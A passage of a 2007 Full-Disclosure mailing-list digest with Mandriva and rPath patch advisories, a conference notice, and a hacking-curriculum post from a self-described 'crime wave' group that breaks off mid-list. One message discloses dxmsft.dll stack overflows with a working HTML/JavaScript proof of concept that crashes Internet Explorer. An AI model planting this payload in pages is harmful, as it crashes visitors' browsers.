>devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> e127a24e39d458865ebc54e61a7db34b 2008.0/x86_64/kernel-server-
>devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> 347576ae981042a8277c2adcdb433cfc 2008.0/x86_64/kernel-server-
>latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> 464e4b918285dac78af1b2521ebac461 2008.0/x86_64/kernel-source-
>2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> affd96915a01aa3927dda61bd1fad19d 2008.0/x86_64/kernel-source-
>latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> 6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9-
>2mdv2007.0.src.rpm
>
__________________________________________________________________
>_____
>
> To upgrade automatically use MandrivaUpdate or urpmi. The
>verification
> of md5 checksums and GPG signatures is performed automatically
>for you.
>
> All packages are signed by Mandriva for security. You can obtain
>the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
>
__________________________________________________________________
>_____
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj
>6pOfo1qywkIBnd5cQnlOdtM=
>=qX1m
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 5
>Date: Mon, 19 Nov 2007 21:14:15 -0000
>From: "Rodrigo Rubira Branco (BSDaemon)"
><rodrigo@...nelhacking.com>
>Subject: [Full-disclosure] H2HC Materials
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20071119231415.E4DED8BEEB@...l.fjaunet.com.br>
>Content-Type: text/plain; charset="iso-8859-1";
>
>For those who have interest in better know about H2HC conference,
>the
>presentation materials are now online at
>http://www.h2hc.org.br/repositorio.php
>
>
>
>cya,
>
>
>Rodrigo (BSDaemon).
>
>--
>http://www.kernelhacking.com/rodrigo
>
>Kernel Hacking: If i really know, i can hack
>
>GPG KeyID: 1FCEDEA1
>
>
>
>________________________________________________
>Message sent using UebiMiau 2.7.2
>
>
>
>------------------------------
>
>Message: 6
>Date: Mon, 19 Nov 2007 15:06:46 -0500
>From: rPath Update Announcements <announce-noreply@...th.com>
>Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-
>mysql
> php5-pear php5-pgsql php5-soap php5-xsl
>To: security-announce@...ts.rpath.com,
> update-announce@...ts.rpath.com, product-announce@...ts.rpath.com
>Cc: lwn@....net, full-disclosure@...ts.grok.org.uk,
> vulnwatch@...nwatch.org, bugtraq@...urityfocus.com
>Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply@...th.com>
>Content-Type: text/plain; charset=us-ascii
>
>rPath Security Advisory: 2007-0242-1
>Published: 2007-11-19
>Products:
> rPath Appliance Platform Linux Service 1
> rPath Linux 1
>
>Rating: Minor
>Exposure Level Classification:
> Remote Deterministic Denial of Service
>Updated Versions:
> php5=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-cgi=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-mysql=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-pear=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-pgsql=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-soap=conary.rpath.com@rpl:1/5.2.5-1-1
> php5-xsl=conary.rpath.com@rpl:1/5.2.5-1-1
>
>rPath Issue Tracking System:
> https://issues.rpath.com/browse/RPL-1943
>
>References:
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900
>
>Description:
> Previous versions of the php5 package contain multiple
>vulnerabilities,
> the most serious of which involve several Denial of Service
>attacks
> (application crashes and temporary application hangs). It is
>not
> currently known that these vulnerabilities can be exploited to
>execute
> malicious code.
>
> In its default configuration, rPath Linux 1 does not install
>php5 and
> is thus not vulnerable; however, systems upon which php5 and
>an exposed
> application have been installed may be vulnerable.
>
>http://wiki.rpath.com/Advisories:rPSA-2007-0242
>
>Copyright 2007 rPath, Inc.
>This file is distributed under the terms of the MIT License.
>A copy is available at http://www.rpath.com/permanent/mit-
>license.html
>
>
>
>------------------------------
>
>Message: 7
>Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
>From: Elazar Broad <elazarb@...thlink.net>
>Subject: [Full-disclosure] Multiple stack-based buffer overflows
>in
> dxmsft.dll
>To: "full-disclosure@...ts.grok.org.uk"
> <full-disclosure@...ts.grok.org.uk>
>Message-ID:
> <30247048.1195511432439.JavaMail.root@...amui-
>norfolk.atl.sa.earthlink.net>
>
>Content-Type: text/plain; charset=UTF-8
>
>There are multiple stack overflows in dxmsft.dll version
>6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX
>Image Transform objects which are safe for scripting. The issue is
>with the Color property of certain objects, so I am assuming this
>property is inherited from a base interface.
>This affects WindowsXP SP2 IE6(fully patched), I have not tested
>this on
>IE7 and it does not appear to affect Windows Server 2003 R2
>SP2(newer version of the dxmsft.dll). I have not tested code
>execution, though it may be possible. I received the following
>response from Microsoft:
>
>---
>>>From our investigation this issue was found to be a stability
>problem which is not exploitable. The net effect of this issue is
>that IE will become unresponsive. The underlying operating system
>will still respond and Killing the process will stop the local
>DoS.
>---
>
>It did not hang IE on my machine, but instead crashed IE with a
>stack overflow.
>This may be related to http://www.securityfocus.com/bid/19029/.
>
>PoC as follows:
>
>---------------------
><!--
>written by e.b.
>-->
><html>
> <head>
> <script language="JavaScript" DEFER>
> function Check() {
> var s = "AAAA";
>
> while (s.length < 999999) s=s+s;
>
> var obj = new
>ActiveXObject("DXImageTransform.Microsoft.Chroma");
> obj.color = s;
>
> var obj = new
>ActiveXObject("DXImageTransform.Microsoft.DropShadow");
> obj.color = s;
>
> var obj = new
>ActiveXObject("DXImageTransform.Microsoft.Glow");
> obj.color = s;
>
> var obj = new
>ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
> obj.color = s;
>
> var obj = new
>ActiveXObject("DXImageTransform.Microsoft.Shadow");
> obj.color = s;
>
> }
> </script>
>
> </head>
> <body onload="JavaScript: return Check();" />
></html>
>---------------------
>
>Elazar
>
>
>
>------------------------------
>
>Message: 8
>Date: Mon, 19 Nov 2007 19:12:41 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler
> packages fix vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuIbR-0008H5-79@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
__________________________________________________________________
>_____
>
> Mandriva Linux Security Advisory MDKSA-
>2007:227
> http://www.mandriva.com/security/
>
__________________________________________________________________
>_____
>
> Package : poppler
> Date : November 19, 2007
> Affected: 2007.1, 2008.0, Corporate 4.0
>
__________________________________________________________________
>_____
>
> Problem Description:
>
> Alin Rad Pop found several flaws in how PDF files are handled
> in poppler. An attacker could create a malicious PDF file that
> would cause poppler to crash or potentially execute arbitrary
>code
> when opened.
>
> The updated packages have been patched to correct this issue.
>
__________________________________________________________________
>_____
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
>
__________________________________________________________________
>_____
>
> Updated Packages:
>
> Mandriva Linux 2007.1:
> 9f040875778bb940669bd2bfdbef248c 2007.1/i586/libpoppler-qt1-
>0.5.4-3.3mdv2007.1.i586.rpm
> 804046d0a838cb3a0a5e355fb118b1bc 2007.1/i586/libpoppler-qt1-
>devel-0.5.4-3.3mdv2007.1.i586.rpm
> dd83d0b61f2ad91ea79f314752a0f514 2007.1/i586/libpoppler-qt4-1-
>0.5.4-3.3mdv2007.1.i586.rpm
> 05d0deb14ec5dad80d8d400756b3d183 2007.1/i586/libpoppler-qt4-1-
>devel-0.5.4-3.3mdv2007.1.i586.rpm
> a23fb37129c8756e353fe47be6d6a8be 2007.1/i586/libpoppler1-0.5.4-
>3.3mdv2007.1.i586.rpm
> 6db198b349d7ebe355d809732ddb21bb 2007.1/i586/libpoppler1-devel-
>0.5.4-3.3mdv2007.1.i586.rpm
> 3e280873492799bebdec28872351052e 2007.1/i586/poppler-0.5.4-
>3.3mdv2007.1.i586.rpm
> 40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4-
>3.3mdv2007.1.src.rpm
>
> Mandriva Linux 2007.1/X86_64:
> b49094eb08c809397081d357f7251166 2007.1/x86_64/lib64poppler-qt1-
>0.5.4-3.3mdv2007.1.x86_64.rpm
> e6f52d8bb5d9f84458ae6892cd7800da 2007.1/x86_64/lib64poppler-qt1-
>devel-0.5.4-3.3mdv2007.1.x86_64.rpm
> 4d08d7343c94a016928cef93490af098 2007.1/x86_64/lib64poppler-qt4-
>1-0.5.4-3.3mdv2007.1.x86_64.rpm
> b0f8d4b4c5f1917c61687900a119e685 2007.1/x86_64/lib64poppler-qt4-
>1-devel-0.5.4-3.3mdv2007.1.x86_64.rpm
> 0955492bd1319fdc2e74c2528994e2bc 2007.1/x86_64/lib64poppler1-
>0.5.4-3.3mdv2007.1.x86_64.rpm
> f918b50ec88a2aca954c156c33c605e8 2007.1/x86_64/lib64poppler1-
>devel-0.5.4-3.3mdv2007.1.x86_64.rpm
> 24fdcc57f5c7481e6732f45e43e49d51 2007.1/x86_64/poppler-0.5.4-
>3.3mdv2007.1.x86_64.rpm
> 40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4-
>3.3mdv2007.1.src.rpm
>
> Mandriva Linux 2008.0:
> 840730bb310636d43a3d07a6d4d4f281 2008.0/i586/libpoppler-devel-
>0.6-3.1mdv2008.0.i586.rpm
> 9d6109683ae8729ad549c56d2f8998c1 2008.0/i586/libpoppler-glib-
>devel-0.6-3.1mdv2008.0.i586.rpm
> b69e7e912fe2f532c5a9ed7c3687eb42 2008.0/i586/libpoppler-glib2-
>0.6-3.1mdv2008.0.i586.rpm
> cea89e4b36cbe99060e3568038474078 2008.0/i586/libpoppler-qt-devel-
>0.6-3.1mdv2008.0.i586.rpm
> 64a459904bf417570e4f2b8e0d550c77 2008.0/i586/libpoppler-qt2-0.6-
>3.1mdv2008.0.i586.rpm
> 5d1c9970275811b934599f95b5264d7d 2008.0/i586/libpoppler-qt4-2-
>0.6-3.1mdv2008.0.i586.rpm
> 7bbfdb4209d40f503bedc8e10e4687df 2008.0/i586/libpoppler-qt4-
>devel-0.6-3.1mdv2008.0.i586.rpm
> 812e34a9b25b4e28169bf84804da8325 2008.0/i586/libpoppler2-0.6-
>3.1mdv2008.0.i586.rpm
> 57380d8dcef7e2b404ed6a7571969bfe 2008.0/i586/poppler-0.6-
>3.1mdv2008.0.i586.rpm
> 697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6-
>3.1mdv2008.0.src.rpm
>
> Mandriva Linux 2008.0/X86_64:
> f64a05a64b742ac4a40a07b8c43b9545 2008.0/x86_64/lib64poppler-
>devel-0.6-3.1mdv2008.0.x86_64.rpm
> 5d9963749a1315a570e9a70783c078da 2008.0/x86_64/lib64poppler-glib-
>devel-0.6-3.1mdv2008.0.x86_64.rpm
> 8d62d129c9279da1ed306a02785d5a7f 2008.0/x86_64/lib64poppler-
>glib2-0.6-3.1mdv2008.0.x86_64.rpm
> f844c25e098d3b295cba161a07795b36 2008.0/x86_64/lib64poppler-qt-
>devel-0.6-3.1mdv2008.0.x86_64.rpm
> 5bfdd34b678a33aeebeec9dc7b0d0dd7 2008.0/x86_64/lib64poppler-qt2-
>0.6-3.1mdv2008.0.x86_64.rpm
> 83334372f43c893ca9afdaefdd7b90d0 2008.0/x86_64/lib64poppler-qt4-
>2-0.6-3.1mdv2008.0.x86_64.rpm
> 82099121bfc50561cb3a175d9d31152b 2008.0/x86_64/lib64poppler-qt4-
>devel-0.6-3.1mdv2008.0.x86_64.rpm
> 59a614072521db19cd3b502e6d49959a 2008.0/x86_64/lib64poppler2-0.6-
>3.1mdv2008.0.x86_64.rpm
> 0a5a8795e93dc014c5f07e2ab6e73393 2008.0/x86_64/poppler-0.6-
>3.1mdv2008.0.x86_64.rpm
> 697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6-
>3.1mdv2008.0.src.rpm
>
> Corporate 4.0:
> 86be8a80003ab4c7a36905eac276dbf6 corporate/4.0/i586/libpoppler-
>qt0-0.4.1-3.6.20060mlcs4.i586.rpm
> 32bae8fecaa6ec4e2b1e7e68458f889b corporate/4.0/i586/libpoppler-
>qt0-devel-0.4.1-3.6.20060mlcs4.i586.rpm
> e9aefa230a3c897361330d91583eb4b9 corporate/4.0/i586/libpoppler0-
>0.4.1-3.6.20060mlcs4.i586.rpm
> 280a9f7aea1b3766864996d5969e69ea corporate/4.0/i586/libpoppler0-
>devel-0.4.1-3.6.20060mlcs4.i586.rpm
> aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler-
>0.4.1-3.6.20060mlcs4.src.rpm
>
> Corporate 4.0/X86_64:
> 62f84dc6ac78997484c76c0e34c74063
>corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-
>3.6.20060mlcs4.x86_64.rpm
> 5fda381aed07c4eaa47f48d7187449ee
>corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-
>3.6.20060mlcs4.x86_64.rpm
> 6abf5b15ba6ffa847dde37a2d0f049d0
>corporate/4.0/x86_64/lib64poppler0-0.4.1-3.6.20060mlcs4.x86_64.rpm
> bcbad9d141f0b9615740d5f027a24699
>corporate/4.0/x86_64/lib64poppler0-devel-0.4.1-
>3.6.20060mlcs4.x86_64.rpm
> aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler-
>0.4.1-3.6.20060mlcs4.src.rpm
>
__________________________________________________________________
>_____
>
> To upgrade automatically use MandrivaUpdate or urpmi. The
>verification
> of md5 checksums and GPG signatures is performed automatically
>for you.
>
> All packages are signed by Mandriva for security. You can obtain
>the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
>
__________________________________________________________________
>_____
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
>XrZ88C4TwK/FkZL+zC+zOLU=
>=ehqr
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 9
>Date: Mon, 19 Nov 2007 19:23:22 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups
>packages
> fix vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuIlm-0008OR-55@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
__________________________________________________________________
>_____
>
> Mandriva Linux Security Advisory MDKSA-
>2007:228
> http://www.mandriva.com/security/
>
__________________________________________________________________
>_____
>
> Package : cups
> Date : November 19, 2007
> Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
>
__________________________________________________________________
>_____
>
> Problem Description:
>
> Alin Rad Pop found several flaws in how PDF files are handled in
>cups.
> An attacker could create a malicious PDF file that would cause
>cups
> to crash or potentially execute arbitrary code when opened.
>
> The updated packages have been patched to correct this issue.
>
__________________________________________________________________
>_____
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
>
__________________________________________________________________
>_____
>
> Updated Packages:
>
> Mandriva Linux 2007.0:
> 4fd4b6a2d384e2cc599b415131a58edd 2007.0/i586/cups-1.2.4-
>1.5mdv2007.0.i586.rpm
> 29fd652c383d4ea688336bc143f1e5cf 2007.0/i586/cups-common-1.2.4-
>1.5mdv2007.0.i586.rpm
> 6a6c275bf900887bc34325ef552f39ab 2007.0/i586/cups-serial-1.2.4-
>1.5mdv2007.0.i586.rpm
> b2f487a129a0ae8cefd66bd89177f5bd 2007.0/i586/libcups2-1.2.4-
>1.5mdv2007.0.i586.rpm
> 853850aadbfed2e7a5fe76ddfd293990 2007.0/i586/libcups2-devel-
>1.2.4-1.5mdv2007.0.i586.rpm
> cdeaa28956923402a8986821fb01ec53 2007.0/i586/php-cups-1.2.4-
>1.5mdv2007.0.i586.rpm
> 5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4-
>1.5mdv2007.0.src.rpm
>
> Mandriva Linux 2007.0/X86_64:
> 7df3b74de7c7d06ca7e750912993b85a 2007.0/x86_64/cups-1.2.4-
>1.5mdv2007.0.x86_64.rpm
> 7c8463926c7a618df34b5e31ddb3b80f 2007.0/x86_64/cups-common-1.2.4-
>1.5mdv2007.0.x86_64.rpm
> 49b51564f1e7ce0df1da99f7f86bff3c 2007.0/x86_64/cups-serial-1.2.4-
>1.5mdv2007.0.x86_64.rpm
> e6c50f4ec69f14569036549ee1402beb 2007.0/x86_64/lib64cups2-1.2.4-
>1.5mdv2007.0.x86_64.rpm
> 0d4f42989dc3604a551cf1f9f4bb1c76 2007.0/x86_64/lib64cups2-devel-
>1.2.4-1.5mdv2007.0.x86_64.rpm
> 8a9a47b66a117d76b6612ac247ee76fb 2007.0/x86_64/php-cups-1.2.4-
>1.5mdv2007.0.x86_64.rpm
> 5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4-
>1.5mdv2007.0.src.rpm
>
> Mandriva Linux 2007.1:
> 8bca1f69b483c9907b164d090bf71161 2007.1/i586/cups-1.2.10-
>2.3mdv2007.1.i586.rpm
> 8d84223e130eb9039dd5e25dfcf47684 2007.1/i586/cups-common-1.2.10-
>2.3mdv2007.1.i586.rpm
> c73459d19f605e2093fe8e7753510cf8 2007.1/i586/cups-serial-1.2.10-
>2.3mdv2007.1.i586.rpm
> 9f4e634eb3e900ffefd59562780a3f28 2007.1/i586/libcups2-1.2.10-
>2.3mdv2007.1.i586.rpm
> fd0883a8e8243ff1ceb862f14b9f032b 2007.1/i586/libcups2-devel-
>1.2.10-2.3mdv2007.1.i586.rpm
> bbb9b69f0e77c2e89f82328fa96a254f 2007.1/i586/php-cups-1.2.10-
>2.3mdv2007.1.i586.rpm
> a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10-
>2.3mdv2007.1.src.rpm
>
> Mandriva Linux 2007.1/X86_64:
> b1ae2a278de78e5e90cd818af06c8869 2007.1/x86_64/cups-1.2.10-
>2.3mdv2007.1.x86_64.rpm
> feb3659cf805bbb8d7d528ec00007416 2007.1/x86_64/cups-common-
>1.2.10-2.3mdv2007.1.x86_64.rpm
> f10bf7760a46b9bf195d0ee2f0b20ad0 2007.1/x86_64/cups-serial-
>1.2.10-2.3mdv2007.1.x86_64.rpm
> 7dccd2d2bd22194c72821a2315be71f0 2007.1/x86_64/lib64cups2-1.2.10-
>2.3mdv2007.1.x86_64.rpm
> 1690756e08eed05d08b9b1dad4554a69 2007.1/x86_64/lib64cups2-devel-
>1.2.10-2.3mdv2007.1.x86_64.rpm
> 9d0f9f960a4e171d5b69a51650a0e97c 2007.1/x86_64/php-cups-1.2.10-
>2.3mdv2007.1.x86_64.rpm
> a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10-
>2.3mdv2007.1.src.rpm
>
> Mandriva Linux 2008.0:
> fb82aaf844538f1192dc5a5bba48ebb2 2008.0/i586/cups-1.3.0-
>3.3mdv2008.0.i586.rpm
> 0f32262c9fd557a33653d346cf561eb0 2008.0/i586/cups-common-1.3.0-
>3.3mdv2008.0.i586.rpm
> 679603be0ff46880b67a8a526fc5e0f6 2008.0/i586/cups-serial-1.3.0-
>3.3mdv2008.0.i586.rpm
> 2c475b6dbc51abb97f4978fb38f805aa 2008.0/i586/libcups2-1.3.0-
>3.3mdv2008.0.i586.rpm
> c8bfa0b793dc2f75c15f19e4822bb02d 2008.0/i586/libcups2-devel-
>1.3.0-3.3mdv2008.0.i586.rpm
> 002037d0c0296df0f488b6827abd3621 2008.0/i586/php-cups-1.3.0-
>3.3mdv2008.0.i586.rpm
> 81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0-
>3.3mdv2008.0.src.rpm
>
> Mandriva Linux 2008.0/X86_64:
> 908ceb359b83acc57734a535e1b7b7a5 2008.0/x86_64/cups-1.3.0-
>3.3mdv2008.0.x86_64.rpm
> 3ef9fbbffa74d7ea35ec501c074f6195 2008.0/x86_64/cups-common-1.3.0-
>3.3mdv2008.0.x86_64.rpm
> b29c75dd2616451c33800772d77f6d22 2008.0/x86_64/cups-serial-1.3.0-
>3.3mdv2008.0.x86_64.rpm
> 7bc26d62f62bebfd13f748a3e1c92f40 2008.0/x86_64/lib64cups2-1.3.0-
>3.3mdv2008.0.x86_64.rpm
> bd7fca05e68b64f71532007f0d3336b6 2008.0/x86_64/lib64cups2-devel-
>1.3.0-3.3mdv2008.0.x86_64.rpm
> f8a5c7b8727652c48080c7d42ebbbb98 2008.0/x86_64/php-cups-1.3.0-
>3.3mdv2008.0.x86_64.rpm
> 81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0-
>3.3mdv2008.0.src.rpm
>
> Corporate 3.0:
> d8f8b23034ed04134c3adffe8900c3c0 corporate/3.0/i586/cups-1.1.20-
>5.14.C30mdk.i586.rpm
> 692d4cc10f27d0b032414bd49047a0d5 corporate/3.0/i586/cups-common-
>1.1.20-5.14.C30mdk.i586.rpm
> f51f15805a46410360a735d266b05513 corporate/3.0/i586/cups-serial-
>1.1.20-5.14.C30mdk.i586.rpm
> ac8c8341c807fe425b95b2d36e540632 corporate/3.0/i586/libcups2-
>1.1.20-5.14.C30mdk.i586.rpm
> 9e4381efa99b4259291d83ce12fbbfd1 corporate/3.0/i586/libcups2-
>devel-1.1.20-5.14.C30mdk.i586.rpm
> dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
>5.14.C30mdk.src.rpm
>
> Corporate 3.0/X86_64:
> af60c4b209e2d7c8b2926152484d7a16 corporate/3.0/x86_64/cups-
>1.1.20-5.14.C30mdk.x86_64.rpm
> 04723ab4e6928c7c94509970ee3affe5 corporate/3.0/x86_64/cups-
>common-1.1.20-5.14.C30mdk.x86_64.rpm
> 633e04aa6a1a94e4c16ff06b80c5b0a1 corporate/3.0/x86_64/cups-
>serial-1.1.20-5.14.C30mdk.x86_64.rpm
> 8455649b95bd3ccbbbd83643355d0d9d corporate/3.0/x86_64/lib64cups2-
>1.1.20-5.14.C30mdk.x86_64.rpm
> b0bb5f82abe5e63f2330a2ce3856d9fd corporate/3.0/x86_64/lib64cups2-
>devel-1.1.20-5.14.C30mdk.x86_64.rpm
> dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
>5.14.C30mdk.src.rpm
>
> Corporate 4.0:
> 601bc4824031861920955ad8555aa4d7 corporate/4.0/i586/cups-1.2.4-
>0.5.20060mlcs4.i586.rpm
> 47167ce1b770bf583616d86a06e4b434 corporate/4.0/i586/cups-common-
>1.2.4-0.5.20060mlcs4.i586.rpm
> 8b12a32bd46ce350143b1722dbf76de2 corporate/4.0/i586/cups-serial-
>1.2.4-0.5.20060mlcs4.i586.rpm
> 7bded05fbaf5b485aef109404f0132f9 corporate/4.0/i586/libcups2-
>1.2.4-0.5.20060mlcs4.i586.rpm
> 09c2660b9004454c07b15d3e57124acc corporate/4.0/i586/libcups2-
>devel-1.2.4-0.5.20060mlcs4.i586.rpm
> 55eddc1759513c131465e61564977618 corporate/4.0/i586/php-cups-
>1.2.4-0.5.20060mlcs4.i586.rpm
> 3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4-
>0.5.20060mlcs4.src.rpm
>
> Corporate 4.0/X86_64:
> 1e3565148aa5da08a4b999b42d7763c8 corporate/4.0/x86_64/cups-1.2.4-
>0.5.20060mlcs4.x86_64.rpm
> a1da7ffbc6fb5294967fde1b785dc7fa corporate/4.0/x86_64/cups-
>common-1.2.4-0.5.20060mlcs4.x86_64.rpm
> 306ffbfbf7606ffc31c197f77c539eef corporate/4.0/x86_64/cups-
>serial-1.2.4-0.5.20060mlcs4.x86_64.rpm
> f0364ad9115ceb82978847ab6cdc66e1 corporate/4.0/x86_64/lib64cups2-
>1.2.4-0.5.20060mlcs4.x86_64.rpm
> d93d6cb48d60436c9f1b32181f82b6c7 corporate/4.0/x86_64/lib64cups2-
>devel-1.2.4-0.5.20060mlcs4.x86_64.rpm
> 802a3f4c3167f06640d2a8c3394cb26c corporate/4.0/x86_64/php-cups-
>1.2.4-0.5.20060mlcs4.x86_64.rpm
> 3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4-
>0.5.20060mlcs4.src.rpm
>
__________________________________________________________________
>_____
>
> To upgrade automatically use MandrivaUpdate or urpmi. The
>verification
> of md5 checksums and GPG signatures is performed automatically
>for you.
>
> All packages are signed by Mandriva for security. You can obtain
>the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
>
__________________________________________________________________
>_____
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
>z5jyh/u/+4QFVsSocymKj/g=
>=RkrY
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 10
>Date: Tue, 20 Nov 2007 07:09:46 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: [Full-disclosure] Tha Manual.
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427A2A.5060905@...il.com>
>Content-Type: text/plain; charset=windows-1252; format=flowed
>
>Tha manual.
>
>
>We do not care about you, or your affilates.
>We are in position, and a new army has emerged.
>The first of a set of manuals, being provided as follows shall be
>provided wherein those who maintain an interest in the power of
>the
>simplicity of man.
>The Manual
>Written by d4rk1v4n, part of the rchrafe crime wave.
>Notes: We are the rchrafe, you are pathetic
>You must learn assembly.
>It must be the breakpoint for any other language, high-level or
>low-level and integral learning processes.
>It will be assumed that a thorough course in C Programming and
>Assembly
>must first commence.
>Also after which a basic, yet thourough understanding of Logic
>Gates,
>which will be provided as articles following the manual.
>This guide is a perfected manual, crisp with only the intent to
>create
>an army of elite.
>Simply to intervene.
>Mod 1: Kernel Design
>{
>Operating System Concepts Chapters 1-3 5-13
>Linux Kernel 2.4 Chapters 1-13
>Shellcode
>Stack Overflows
>Format string exploitation
>Integer Overflows
>Race Conditions (files)
>Kernel Exploitation (Linux)
>Kernel patching (Linux)
>Kernel rootkit (Linux)
>linux process patching
>dlmalloc exploitation (partial analysis of 6 thousand line src)
>raw sockets, hping2
>i/o multiplexing
>pthreads
>ELF executable format
>OS Fingerprinting
>IRC Protocol RFC
>SMTP Protocol
>ICMP Protocol
>POP3 protocol
>}
>Mod 2: Algorithms & Data Structures
>{
>Computer Organization Hardware/Software Int. chapters 1-6
>FreeBSD Design And Implementation chapters 1-6, 8, 12, 13
>Algorithms And Data structures (Sedgwick, knuth, whale)
>Linux TCPIP Implementation
>Linux Synchronization analysis
>Linux ext3 analysis
>Linux kmalloc analysis
>Threads
>Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85)
>Role Based Access Control (rsbac for linux)
>Buffer overflow Protection
>MIPS ASM
>Computer Networks - Tanenbaum
>C++ (full)
>Perl
>phkmalloc exploitation
>advanced dlmalloc exploitation
>advanced fmt string exploitation
>advanced race conditions (double free, etc)
>freebsd kernel exploitation
>freebsd kernel rootkit
>cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS)
>TCP RFC
>IP RFC
>IPSEC RFC
>DNS specification
>HTTP specification
>IMAP specification
>SSL 3 specification
>Kerberos
>asynch i/o
>perl exploitation
>php exploitation
>sql injection
>win32 API
>PE executable format
>windows ring 3 hacks
>IDA/Softice work
>binary encryption
>polymorphic shellcode
>WIN DCOM
>ONE RPC Specification
>}
>Mod 3: Large source analysis
>{
